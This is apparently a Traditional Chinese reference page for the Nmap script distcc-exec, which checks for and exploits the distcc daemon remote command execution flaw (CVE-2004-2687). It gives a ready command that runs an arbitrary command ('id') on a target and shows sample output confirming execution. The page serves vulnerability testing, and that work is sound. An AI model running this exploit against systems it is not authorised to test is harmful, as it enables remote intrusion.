Nmap Script指令摘要
這個指令用於檢測和利用分散式編譯器守護程序 distcc 中的一個遠端代碼執行漏洞偵測,遠端代碼執行漏洞偵測表示攻擊者可以透過遠端的方式,在目標系統上執行任意的程式碼,這可能對目標系統造成嚴重的安全風險;該漏洞於2002年被揭露,但由於服務的配置不當,現在中仍然存在這個漏洞。
Nmap Script指令參數
cmd
在遠端伺服器上執行命令的參數,您可以將特定的命令提供給此參數,指令將嘗試在目標伺服器上執行該命令。
vulns.short, vulns.showall
請查閱 vulns 函式庫的文件。
Nmap Script指令範例
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
Nmap Script指令輸出
PORT STATE SERVICE
3632/tcp open distccd
| distcc-exec:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Description:
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
|
| References:
| https://distcc.github.io/security.html
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Nmap Script作者:
Patrik Karlsson
License: Same as Nmap--See https://nmap.org/book/man-legal.html